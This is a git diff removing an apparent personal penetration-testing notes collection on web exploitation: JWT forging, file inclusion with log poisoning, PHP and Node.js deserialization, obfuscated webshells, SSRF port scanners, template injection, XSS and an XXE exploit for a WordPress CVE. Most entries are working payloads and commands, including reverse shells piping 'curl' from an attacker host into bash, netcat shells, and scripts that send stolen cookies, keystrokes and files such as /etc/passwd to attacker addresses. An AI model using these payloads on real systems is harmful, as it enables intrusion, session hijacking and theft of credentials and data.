-* Changing the header to `{"typ": "JWT", "alg": "HS256"}`, spaces inbetween values.
-```sh
-$ echo -n '{"typ": "JWT", "alg": "HS256"}' | base64
-eyJ0eXAiOiAiSldUIiwgImFsZyI6ICJIUzI1NiJ9
-```
-
-* Encoding the payload, no spaces inbetween. Cut `==` at the end.
-```sh
-echo -n '{"iss":"http://localhost","iat":1585323784,"exp":1585323904,"data":{"hello":"world"}}' | base64
-eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTg1MzIzNzg0LCJleHAiOjE1ODUzMjM5MDQsImRhdGEiOnsiaGVsbG8iOiJ3b3JsZCJ9fQ== 
-```
-
-* Crafting the HMAC signature
-    * Convert `K_pub` file to hex
-    ```sh
-    cat id_rsa.pub | xxd -p | tr -d "\\n"
-    ```
-    * Sign the message to get the signature as hex value
-    ```sh
-    echo -n "eyJ0eXAiOiAiSldUIiwgImFsZyI6ICJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTg1MzIzNzg0LCJleHAiOjE1ODUzMjM5MDQsImRhdGEiOnsiaGVsbG8iOiJ3b3JsZCJ9fQ" | openssl dgst -sha256 -mac HMAC -macopt hexkey <converted_public_hex>
-    ```
-    * Decode hex to binary data and reencode as base64 via python
-    ```python
-    python -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('<signature_as_hexval>')).replace('=','')\")" 
-    ```
-
-## Tools
-* [JWTtool](https://github.com/ticarpi/jwt_tool.git)
-* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token)
-* https://jwt.io
diff --git a/exploit/web/jwt/jwt_tool b/exploit/web/jwt/jwt_tool
deleted file mode 160000
index aa496cf..0000000
--- a/exploit/web/jwt/jwt_tool
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit aa496cf0e2f832318afd043e4baac6cef0502689
diff --git a/exploit/web/local_file_inclusion.md b/exploit/web/local_file_inclusion.md
deleted file mode 100644
index 7ce26b0..0000000
--- a/exploit/web/local_file_inclusion.md
+++ /dev/null
@@ -1,94 +0,0 @@
-# Local File Inclusion
-To test for LFI what we need is a parameter on any URL or other inputs, i.e. request body which includes a file. A parameter in the URL can look like `https://test.com/?file=robots.txt`, the file may be changed.
-
-* [Acunetix article](https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/)
-## PHP Functions
-* Functions provoking an LFI
-```php
-include()
-require()
-include_once ()
-require_once()
-```
-
-## Usage
-
-* Exploit URL parameter by including other files.
-```
-http://example.com/home?page=about.html
-http://example.com/home?page=/etc/passwd
-```
-    * changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks)
-    ```
-    http://example.com/home?page=../../../../etc/passwd
-    ```
-    or
-    ```
-    http://example.com/home?page=html/../../../home/<username>/.ssh/id_rsa
-    ```
-
-### Log Poisoning
-* Inject malicious code into logfiles before using path traversal to open the logfile and trigger the rce.
-* `www-data` needs read & write permisson in order to do so.
-* Include php code into the `User-Agent` header of the HTTP request. For example a GET parameter to deliver system commandsas follows
-```sh
-curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: <TARGETIP>' -H 'User-Agent: Mozilla/5.0 <?php system($_GET['lfi']); ?> Firefox/70.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'DNT: 1' -H 'Upgrade-Insecure-Requests: 1'
-```
-
-* Follow up with a request to
-
-```HTTP
-curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
-```
-
-### /proc/self/fd
-* [outpost24](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2)
-*  Log poisoning and opening logfile via `/proc/self/fd/xx`.
-
-## Files of Interest
-* `/etc/issue`
-* `/etc/profile`
-* `/proc/version`
-* `/etc/passwd`
-* `/etc/apache2/.htpasswd`
-* `/etc/shadow`
-* `/etc/group`
-* `/etc/motd`
-* `/etc/mysql/my.cnf`
-* `/root/.bash_history`
-* `/var/log/dmessage`
-* `/var/mail/root`
-* `/root/.ssh/id_rsa`
-* `/var/log/apache2/access.log`
-* `C:\boot.ini`
-* `/proc/self/fd/xx`
-* `/proc/version`
-* `/proc/cmdline`
-* `/proc/[0-9]*/fd/[0-9]*`
-
-* `sess_<cookieValue>` if the location of the session file is known. Some paths are
-```sh
-c:\Windows\Temp
-/tmp/
-/var/lib/php5
-/var/lib/php/session
-```
-
-### Base64 Encoding via PHP
-* Circumvent filter via encoding local files included ins a GET parameter value
-* __Read PHP files through encoding them, so they won't be executed__
-```http
-curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<fileOnServer>.php
-curl http://test.com/test.php?file=php://filter/read=string.rot13/resource=/etc/passwd
-```
-* Use encoded data as input through the parameter
-```sh
-curl http://test.com/test.php?file=data://text/plain;base64,dGhlIGFuc3dlciBpcyA0Mgo=
-```
-
-## Tricks
-
-* Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4
-* Terminate query with `/.`
-* `..//..//..//file`, double slashes
-* URL encode path
diff --git a/exploit/web/methodology.md b/exploit/web/methodology.md
deleted file mode 100644
index fd3e0f2..0000000
--- a/exploit/web/methodology.md
+++ /dev/null
@@ -1,17 +0,0 @@
-We'll look at this as a step-by-step process. Let's say that we've been given a website to perform a security audit on.
-
-1. The first thing we would do is take a look at the website as a whole. Using browser extensions such as the aforementioned Wappalyzer (or by hand) we would look for indicators of what languages and frameworks the web application might have been built with. Be aware that Wappalyzer is not always 100% accurate. A good start to enumerating this manually would be by making a request to the website and intercepting the response with Burpsuite. Headers such as server or x-powered-by can be used to gain information about the server. We would also be looking for vectors of attack, like, for example, an upload page.
-2. Having found an upload page, we would then aim to inspect it further. Looking at the source code for client-side scripts to determine if there are any client-side filters to bypass would be a good thing to start with, as this is completely in our control.
-3. We would then attempt a completely innocent file upload. From here we would look to see how our file is accessed. In other words, can we access it directly in an uploads folder? Is it embedded in a page somewhere? What's the naming scheme of the website? This is where tools such as Gobuster might come in if the location is not immediately obvious. This step is extremely important as it not only improves our knowledge of the virtual landscape we're attacking, it also gives us a baseline "accepted" file which we can base further testing on.
-    * An important Gobuster switch here is the -x switch, which can be used to look for files with specific extensions. For example, if you added -x php,txt,html to your Gobuster command, the tool would append .php, .txt, and .html to each word in the selected wordlist, one at a time. This can be very useful if you've managed to upload a payload and the server is changing the name of uploaded files.
-4. Having ascertained how and where our uploaded files can be accessed, we would then attempt a malicious file upload, bypassing any client-side filters we found in step two. We would expect our upload to be stopped by a server side filter, but the error message that it gives us can be extremely useful in determining our next steps.
-
-
-Assuming that our malicious file upload has been stopped by the server, here are some ways to ascertain what kind of server-side filter may be in place:
-
-    * If you can successfully upload a file with a totally invalid file extension (e.g. testingimage.invalidfileextension) then the chances are that the server is using an extension blacklist to filter out executable files. If this upload fails then any extension filter will be operating on a whitelist.
-    * Try re-uploading your originally accepted innocent file, but this time change the magic number of the file to be something that you would expect to be filtered. If the upload fails then you know that the server is using a magic number based filter.
-    * As with the previous point, try to upload your innocent file, but intercept the request with Burpsuite and change the MIME type of the upload to something that you would expect to be filtered. If the upload fails then you know that the server is filtering based on MIME types.
-    * Enumerating file length filters is a case of uploading a small file, then uploading progressively bigger files until you hit the filter. At that point you'll know what the acceptable limit is. If you're very lucky then the error message of original upload may outright tell you what the size limit is. Be aware that a small file length limit may prevent you from uploading the reverse shell we've been using so far.
-
-
diff --git a/exploit/web/nodejs/deserialization.md b/exploit/web/nodejs/deserialization.md
deleted file mode 100644
index 25ee25c..0000000
--- a/exploit/web/nodejs/deserialization.md
+++ /dev/null
@@ -1,14 +0,0 @@
-# De/Serialization
-
-* `_$$ND_FUNC$$_function (){}` is executed after parsing
-
-## Example Payloads
-
-* Encode, send and wait with `sudo tcpdump -i <interface> icmp`
-```js
-{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
-```
-* reverse shell via 
-```js
-{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 | bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
-```
diff --git a/exploit/web/php/Chankro b/exploit/web/php/Chankro
deleted file mode 160000
index 7b6e844..0000000
--- a/exploit/web/php/Chankro
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 7b6e844e18f6812beb18db4b67b246edcec04b84
diff --git a/exploit/web/php/command_injection.md b/exploit/web/php/command_injection.md
deleted file mode 100644
index 1eb1b00..0000000
--- a/exploit/web/php/command_injection.md
+++ /dev/null
@@ -1,12 +0,0 @@
-# PHP Command Injection
-Injecting commands to execute code on the server side via php.
-
-* [Hacktricks](https://book.hackstricks.xyz/pentesting-web/file-upload)
-
-## Blind Command Injection
-Attacker does not register a direct response.
-
-### Detect Blind Command Injection
-Try to save output to URI resource like `output.php`
-
-## Active Command Injection
diff --git a/exploit/web/php/password_reset.md b/exploit/web/php/password_reset.md
deleted file mode 100644
index 8cf9bc9..0000000
--- a/exploit/web/php/password_reset.md
+++ /dev/null
@@ -1,4 +0,0 @@
-# Password Reset
-
-* Using a password reset while inserting an email address via GET and POST method.
-* `$_REQUEST` as an array favors POST over GET. So, sending the attacker email address via POST with the GET query parameter.
diff --git a/exploit/web/php/php_base64_filter.md b/exploit/web/php/php_base64_filter.md
deleted file mode 100644
index cac118b..0000000
--- a/exploit/web/php/php_base64_filter.md
+++ /dev/null
@@ -1,6 +0,0 @@
-# PHP Filter
-
-* Include into GET query, and get index page, for example
-```sh
-<URL>/?view=php://filter/read=convert.base64-encode/resource=./dog/../index
-```
diff --git a/exploit/web/php/php_image_exif.md b/exploit/web/php/php_image_exif.md
deleted file mode 100644
index 3a31090..0000000
--- a/exploit/web/php/php_image_exif.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# PHP Payload in Image ExifData
-
-* Test 
-```sh
-exiftool -Comment="<?php echo \"<pre>Test Payload</pre>\"; die(); ?>" test-USERNAME.jpeg.php
-```
-
-* Build Payload with AV evasion
-```sh
-<?php
-    $cmd = $_GET["wreath"];
-    if (isset($cmd)){
-        echo "<pre>" . shell_exec($cmd) . "</pre>";
-    }
-    die();
-?>
-```
-
-* [php obfuscater](https://www.gaijin.at/en/tools/php-obfuscator)
-
-* Obfuscated code with escaped `$`
-```sh
-<?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>
-```
-* Upload and execute commands with get parameter `?wreath=systeminfo`
-
-## Uploading Reverse through Webshell
-* Parameter for Webshell
-```sh
-curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe
-```
-* Trigger uploaded netcat
-```sh
-powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe
-```
diff --git a/exploit/web/php/php_user_agent_rce.md b/exploit/web/php/php_user_agent_rce.md
deleted file mode 100644
index fd0004b..0000000
--- a/exploit/web/php/php_user_agent_rce.md
+++ /dev/null
@@ -1,19 +0,0 @@
-# RCE inside HTTP Request
-* a.k.a. Log Poisoning
-* User Agent can be filled with php code
-```sh
-GET /?view=./dog/../../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1
-Host: 10.10.59.238
-User-Agent: <?php file_put_contents('monkey.php',file_get_contents('http://<attacker-IP>:<attacker-Port>/shell.php')); ?>
-[...]
-```
-
-* copied from browser as curl command:
-```
-curl 'http://10.10.211.157/?ext=%20HTTP/1.1&view=./dog/../../../../var/log/apache/access.log' -H "User-Agent: <?php file_put_contents('monkey.php', file_get_contents('http://10.9.7.193:8000/shell.php'));?>"
-```
-* go to the access log
-```sh
-10.10.211.157/?ext=.log&view=./dog/../../../../var/log/apache2/access
-```
-* Afterwards visit `10.10.211.157/monkey.php`
diff --git a/exploit/web/php/phpggc b/exploit/web/php/phpggc
deleted file mode 160000
index 9121c3f..0000000
--- a/exploit/web/php/phpggc
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 9121c3f2c95b9b7726f663a1f2ce6526be69c713
diff --git a/exploit/web/php/preload_lib.md b/exploit/web/php/preload_lib.md
deleted file mode 100644
index 32a317e..0000000
--- a/exploit/web/php/preload_lib.md
+++ /dev/null
@@ -1,15 +0,0 @@
-# Preload Library
-
-* [Bug report](https://bugs.php.net/bug.php?id=46741)
-* [Chankro repo](https://github.com/TarlogicSecurity/Chankro.git)
-
-## Usage
-* Create lib, find path via `<URL>/phpinfo.php`
-```sh
-echo "#!/usr/bin/env bash" > rev.sh
-echo "cat /etc/passwd > <basepath>/output.txt" >> rev.sh
-
-python2 ./chankro.py --arch 64 --input rev.sh --output chan.php --path <basepath>
-```
-* Put into image file via exiftool or write magic header
-* Upload
diff --git a/exploit/web/php/unserialize.md b/exploit/web/php/unserialize.md
deleted file mode 100644
index 2f40b20..0000000
--- a/exploit/web/php/unserialize.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Unserialize
-
-* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize)
-
-* Serialize via
-```php
-<?php
-class FormSubmit {
-    public $form_file = 'messages.php';
-    public $message = '<?php
-    if(isset($_GET[\'cmd\']))
-    {
-        system($_GET[\'cmd\']);
-    }
-?>';
-}
-
-print urlencode(serialize(new FormSubmit));
-?>
-```
-
-```php
-<?php class file 
-    { 
-        public $file = 'rev.php'; public $data = '<?php shell_exec("nc -e /bin/bash $TARGET_IP 4455"); ?>'; 
-    } 
-    echo (serialize(new file)); 
-?>
-```
diff --git a/exploit/web/re_registration.md b/exploit/web/re_registration.md
deleted file mode 100644
index bb5db62..0000000
--- a/exploit/web/re_registration.md
+++ /dev/null
@@ -1,9 +0,0 @@
-# Re-registration
-
-Let's understand this with the help of an example, say there is an existing user with the name admin and now we want to get access to their account so what we can do is try to re-register that username but with slight modification. We are going to enter " admin"(notice the space in the starting). Now when you enter that in the username field and enter other required information like email id or password and submit that data. It will actually register a new user but that user will have the same right as normal admin. And that new user will also be able to see all the content present under the user admin.
-
-# Usage
-* Re-register. The name is taken, that's the point, but alter the string
-```
- try to register a user name darren, you'll see that user already exists so then try to register a user " darren" and you'll see that you are now logged in and will be able to see the content present only in Darren's account which in our case is the flag that you need to retrieve.
-```
diff --git a/exploit/web/remote_file_inclusion.md b/exploit/web/remote_file_inclusion.md
deleted file mode 100644
index 6061860..0000000
--- a/exploit/web/remote_file_inclusion.md
+++ /dev/null
@@ -1,9 +0,0 @@
-# Remote File Inclusion
-
-
-## Usage
-* Use a GET query parameter to include an attacker URL. 
-```sh
-https://test.com/files.php?file=http://<attacker-IP>:<attacker-Port>/reverse_shell.txt
-```
-* Payload may be PHP for example, but should not end in executable file extensions. The payload is executed locally, otherwise.
diff --git a/exploit/web/ssrf/check_ssrf.py b/exploit/web/ssrf/check_ssrf.py
deleted file mode 100644
index 76700b5..0000000
--- a/exploit/web/ssrf/check_ssrf.py
+++ /dev/null
@@ -1,17 +0,0 @@
-#!/usr/bin/env python
-
-import requests
-
-s = requests.Session()
-
-t = []
-j = 0
-for i in range(1, 65536):
-   r = s.get(f"http://10.10.214.67:8000/attack?url=http%3A%2F%2F0xa0a0a05%3A{i}")
-   print(r.text)
-   if "Target is not reachable!" in r.text:
-       print(f"{i} is reachable, sum is {j}")
-       t.append(f"Port {i}, {r.text}")
-   else: 
-       print (f"{i} not reachable")
-print(t)
diff --git a/exploit/web/ssrf/curl.sh b/exploit/web/ssrf/curl.sh
deleted file mode 100644
index 2f492aa..0000000
--- a/exploit/web/ssrf/curl.sh
+++ /dev/null
@@ -1,8 +0,0 @@
-#!/usr/bin/env bash
-for x in {1..65535};
-    do cmd=$(curl -so /dev/null http://10.10.214.67:8000/attack?url=http://2130706433:${x} \
-        -w '%{size_download}');
-    if [ $cmd != 1045 ]; then
-        echo "Open port: $x"
-    fi
-done
diff --git a/exploit/web/ssrf/iframe.md b/exploit/web/ssrf/iframe.md
deleted file mode 100644
index 109f34a..0000000
--- a/exploit/web/ssrf/iframe.md
+++ /dev/null
@@ -1,22 +0,0 @@
-# SSRF through iframe
-
-* [taken from Jomar's Website](https://www.jomar.fr/posts/2021/ssrf_through_pdf_generation/)
-* Upload iframe with attacker server and php code ready to be executed. Redirect to a local file on the server
-```php
-<?php
-$loc = "http://127.0.0.1/";
-
-if(isset($_GET['a'])){
-    $loc = $_GET['a'];
-}
-header('Location: '.$loc);
-?>
-```
-* Payload looks like this
-```html
-<iframe src="http://$ATTACKER_IP:4711/ssrf.php?a=file:///etc/passwd"/>
-```
-* Start a php adhoc server and run it
-```php
-php -S 0.0.0.0:4711
-```
diff --git a/exploit/web/ssrf/ip2dh.py b/exploit/web/ssrf/ip2dh.py
deleted file mode 100644
index 6a82168..0000000
--- a/exploit/web/ssrf/ip2dh.py
+++ /dev/null
@@ -1,31 +0,0 @@
-"""
-u can run this in the following format:
-For decimal: python3 ip2dh.py D <Ip-address>
-For Hexadecimal: python3 ip2dh.py H <Ip-address>
-"""
-#!/usr/bin/python3
-
-import sys
-
-if len(sys.argv) < 3:
-    print('\nYou must give desired format and IPv4 address as input...')
-    print('e.g.: D 192.168.10.100')
-    print('Valid formats D=Decimal H=Hexadecimal\n')
-    sys.exit(1)
-
-Format = sys.argv[1]
-
-def long(ip):
-   IP = ip.split('.')
-   IP = list(map(int, IP))
-   LongIP = IP[0]*2**24 + IP[1]*2**16 + IP[2]*2**8 + IP[3]
-   return LongIP
-
-ip = long(sys.argv[2])
-
-if Format == 'D':
-   print('\nIP as Decimal format: %s' % (ip))
-
-if Format == 'H':
-   print('\nIP as Hexadecimal format: %s' % (hex(ip)))
-
diff --git a/exploit/web/ssrf/ssrf.md b/exploit/web/ssrf/ssrf.md
deleted file mode 100644
index b977e8f..0000000
--- a/exploit/web/ssrf/ssrf.md
+++ /dev/null
@@ -1,66 +0,0 @@
-# Server Side Request Forgery (SSRF)
-is a vulnerability in web applications whereby an attacker can make further HTTP requests through the server. An attacker can make use of this vulnerability to communicate with any internal services on the server's network which are generally protected by firewalls. The attack can either be blind or data is returned to the attacker dire tly.
-
-## Usage
-
-### Sanity Test Service
-Test if input is sanitized by exploiting function. Here it is IP:PORT finding service. Test for localhost ports.
-```URL
-http://127.0.0.1:3306
-http://localhost:5432
-http://0.0.0.0:53
-```
-
-* IPv6
-```URL
-http://[::]:3306
-http://:::3006
-```
-
-* Cloud info in Link Local IP range `169.254.0.0/16`
-```URL
-169.254.169.254 --> AWS info
-169.254.169.253 --> DNS AWS VPC
-169.254.169.123 --> Stratum 3 NTP
-127.0.0.1:53    --> systemd DNS
-```
-
-* [Changing input format into hex or encoded](https://gist.github.com/mzfr/fd9959bea8e7965d851871d09374bb72)
-
-### Reading files
-```
-file:///etc/passwd
-```
-
-### Request Forgery through GET parameters
-* Request app server through parameter 
-```sh
-http://<ssrf-Server>/?url=http://<AppServer>/secret/url
-```
-* Request remote resources, or path traversal on remote resource
-```sh
-http://<ssrf-Server>/?url=/item?id=42
-http://<ssrf-Server>/?url=../../etc/passwd
-```
-* Request subdomain URL and cut following unnecessary parameters through `&x=&id=42`. Parameter `x` does not exist. So, it will be ignored
-```sh
-http://<ssrf-Server>/?url=db.test.com/shop/item?secret=key&x=&id=42
-```
-
-### HTML Form 
-User input through POST form on websites may open files (other MIME types) from server resources. Updating the path reference may yield unintended file content.
-```HTML
-<input type="radio" name="avatar" value="assets/avatars/6.png">
-```
-This may be used for path traversal
-```HTML
-<input type="radio" name="avatar" value="x/../private">
-```
-Check return value of the form for result.
-
-## Tricks
-* `localtest.me` resolves to `127.0.0.1`, may be used to extend a domain inside a parameter to redirect to localhost.
-
-## Tools
-* [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#file)
-* https://requestbin.com
diff --git a/exploit/web/ssti/ssti.md b/exploit/web/ssti/ssti.md
deleted file mode 100644
index 258f610..0000000
--- a/exploit/web/ssti/ssti.md
+++ /dev/null
@@ -1,64 +0,0 @@
-# Server Side Template Injection (SSTI)
-Pass in parameters to control the template.
-
-## Usage
-* Sanity test
-```python
-{{2+2}} 
-```
-
-* Flask template LFI
-```python
-{{ ''.__class__.__mro__[2].__subclasses__()[40]()(<file>).read()}}
-``` 
-
-* Executing commands
-```sh
-{{ ''.__class__.__mro__[1].__subclasses__()[401]("whoami", shell=True, stdout=-1).communicate() }}
-```
-
-* RCE on server
-```python
-{{config.__class__.__init__.__globals__['os'].popen(<command>).read()}}
-```
-
-## Identification of Template Engine
-Identify via payload checking
-* Smarty: `a{*comment*}b`
-* Mako: `${"z".join("ab")}`
-* Twig or Jinja2
-```sh
-{{7*7}}
-{{7*'7'}}
-```
-
-## Tools 
-### TPlmap
-```sh
-git clone https://github.com/epinna/tplmap.git
-pip2 install -r requirements
-```
-
-|HTTP Method|Parameter|
-|-----------|---------|
-|GET|`tplmap -u <url>/?<vulnparam>`|
-|POST|`tplmap -u <url> -d '<vulnparam>'`|
-
-* Using remote command
-```
-tplmap -u http://<ip>:<port>/ -d '<vulnparam>' --os-cmd "cat /etc/passwd"
-```
-
-### Countermeasure
-* Remove everything in user input but alnum. Passing data, not data to f-string.
-```python
-input = re.sub("[^A-Za-z0-9]", "", input)
-template = "User input is {{ input }}"
-return render_template_string(template, input=input)
-```
-
-## Bypass
-* Save reverse shell as `rev`
-```sh
-{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl $ATTACKER_IP:8000/rev | bash")|attr("read")()}}
-```
diff --git a/exploit/web/ssti/tplmap b/exploit/web/ssti/tplmap
deleted file mode 160000
index 616b0e5..0000000
--- a/exploit/web/ssti/tplmap
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 616b0e527f62dd0930e6346ede6bef79e9bcf717
diff --git a/exploit/web/url_forgery.md b/exploit/web/url_forgery.md
deleted file mode 100644
index 7d0ce82..0000000
--- a/exploit/web/url_forgery.md
+++ /dev/null
@@ -1,3 +0,0 @@
-# URL Forgery
-
-* Just change parts of the URL
diff --git a/exploit/web/wordpress.md b/exploit/web/wordpress.md
deleted file mode 100644
index 12a9d75..0000000
--- a/exploit/web/wordpress.md
+++ /dev/null
@@ -1,22 +0,0 @@
-# Wordpress
-
-## ure_user_roles
-
-* [exploitdb 44595](https://exploit-db.com/exploits/44595.)
-* [windsordeveloper](https://windsorwebdeveloper.com/dc-6-vulnhub-walkthrough/)
-
-* Update user profile and append POST parameter to gain administrator role on user
-```sh
-&ure_other_roles=administrator
-```
-
-## Shell Upload
-
-* Msfconsole
-```sh
-exploit/unix/webapp/wp_admin_shell_upload
-```
-
-## Template & Plugin Editing
-
-* If template injection does not work, use plugin injection on `akismet.php`
diff --git a/exploit/web/xpath.md b/exploit/web/xpath.md
deleted file mode 100644
index 177b988..0000000
--- a/exploit/web/xpath.md
+++ /dev/null
@@ -1,6 +0,0 @@
-# XPATH injection
-
-* Similar to SQL injection, it is a input/parameter injection
-
-* [payloads all the things XPATH](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection)
-* Use [lanfran's payload list](https://lanfran02.github.io/posts/cold_vvars/XPATH_list.txt) as burpsuite sniper payload
diff --git a/exploit/web/xss.md b/exploit/web/xss.md
deleted file mode 100644
index 2e78749..0000000
--- a/exploit/web/xss.md
+++ /dev/null
@@ -1,149 +0,0 @@
-# Cross-Site Scripting
-A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS.
-
-## Stored XSS
-This is where a malicious string originates from the websites database. Such as (stored in a db)
-* User profiles
-* Chats and comments
-* Part of link
-
-* Blind xss is stored inside the app but effects are only visible by proxy, [xsshunter](https://xsshunter.com/).
-
-### Examples
-* Sanity test by changing DOM content
-```
-<script>document.getElementById('myIdName').innerHTML="napf"</script>
-```
-
-* Cookie stealing
-
-```javascript
-<script>document.location='/log/'+document.cookie</script>
-```
-    * Navigte to `/logs` and take sid
-
-* Open nc port and collect cookies
-```javascript
-<script>document.location='http://<attacker-IP>:<attacker-Port>/XSS/grabber.php?c='+document.cookie</script>
-<script>var i=new Image;i.src="http://<attacker-IP>:<attacker-Port>/?"+document.cookie;</script>
-
-```
-
-## Reflected XSS
-In a reflected cross-site scripting attack, the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.
-* URL parameters inside GET queries
-* File paths
-
-### Usage
-As script inside parameter
-```sh
-http://example.com/search?keyword=<script>...</script>
-```
-* Show server IP
-```
-http://example.com/reflected?keyword=<script>alert(window.location.hostname)</script>
-```
-* Session stealing, base64 encoded
-```javascript
-<script>fetch('http://<attacker-IP>/steal?cookie=' + btoa(document.cookie));</script>
-```
-    * open netcat binder to catch the http queries
-
-## DOM based XSS
-With DOM-Based xss, an attackers payload will only be executed when the vulnerable Javascript code is either loaded or interacted with. It goes through a Javascript function like so:
-```javascript
-var keyword = document.querySelector('#search')
-keyword.innerHTML = <script>...</script>
-```
-
-### Usage
-* Find the sub-object inside the document
-```javascript
-test" onmouseover="alert('YO!')"
-```
-* Show cookie
-```
-test" onmouseover="alert(document.cookie)"
-```
-## Bypass Filters
-* `<script>` sanitizing
-```HTML
-<img src=x onerror=alert('Hello');>
-```
-or 
-```javascript
-<</script>script>alert("1");<</script>/script>
-```
-* `alert()` sanitizing
-```javascript
-0\"autofocus/onfocus=alert(1)--><onerror=prompt(2)>"-confirm(3)-"
-```
-or
-```javascript
-0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
-```
-* Strings, here its `Hello`
-```javascript
-<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>
-```
-
-## Portscanner via Javascript
-* By requesting the favicon, checking port 80
-```javascript
- <script>
- for (let i = 0; i < 256; i++) {
-  let ip = '192.168.0.' + i
-
-  let code = '<img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=/log/' + ip + '">'
-  document.body.innerHTML += code
- }
-</script> 
-```
-
-* [pdp's portscanner](https://www.gnucitizen.org/files/2006/08/jsportscanner.js)
-
-
-## Keylogger
-```javascript
- <script type="text/javascript">
- let l = ""; // Variable to store key-strokes in
- document.onkeypress = function (e) { // Event to listen for key presses
-   l += e.key; // If user types, log it to the l variable
-   console.log(l); // update this line to post to your own server
- }
-</script> 
-```
-* base64 encoded keylogger
-```javascript
-<script>
-document.onkeypress = function (e) {
-    fetch('http://<attacker-IP>/log?key=' + btoa(e.key) );
-}
-</script>
-```
-
-## Tab Nabbing
-
-* Redirection of source after opening a tab through a provisioned link and back referencing 
-* [Hacktricks Tabnabbing](https://book.hacktricks.xyz/pentesting-web/reverse-tab-nabbing)
-
-
-## Tricks and Tips
-* Use Polyglots
-* [XSS Filter Evasion Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html)
-* Close the a vulnerable, exploitable tag and open a script tag
-```html
-</tag><script>alert(1);</script>
-```
-
-## Protection Methods
-
-There are many ways to prevent XSS, here are the 3 ways to keep cross-site scripting our of your application.
-
-1. Escaping - Escape all user input. This means any data your application has received  is secure before rendering it for your end users. By escaping user input, key characters in the data received but the web page will be prevented from being interpreter in any malicious way. For example, you could disallow the < and > characters from being rendered.
-
-2. Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place.
-
-3. Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helpful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the < character into the HTML entity &#60;
-
-
diff --git a/exploit/web/xxe/wp_xxe_.md b/exploit/web/xxe/wp_xxe_.md
deleted file mode 100644
index cc37a5f..0000000
--- a/exploit/web/xxe/wp_xxe_.md
+++ /dev/null
@@ -1,30 +0,0 @@
-# CVE-2021-29447
-
-* Upload of wav file has following consequences
-    * **Arbitrary File Disclosure** for example `wp-config.php`
-    * **Server Side Request Forgery** 
-
-
-## Usage
-
-* Create `wav` Payload
-```sh
-echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://<attacker-IP>:<Port>/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
-```
-* Create `dtd` Payload, which is downloaded from attacker machine by the wp instance. Following payload
-```sh
-<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
-<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://<attacker-IP>:<attackerPort>/?p=%file;'>" >
-```
-
-* Launch http server
-```sh
-php -S 0.0.0.0:8000
-python -m http.server
-```
-* Copy returned base64 into `php` file
-```php
-<?php echo zlib_decode(base64_decode('<returnedBase64>')); ?> 
-```
-
-
diff --git a/exploit/web/xxe/xml_external_entity.md b/exploit/web/xxe/xml_external_entity.md
deleted file mode 100644
index a266f74..0000000
--- a/exploit/web/xxe/xml_external_entity.md
+++ /dev/null
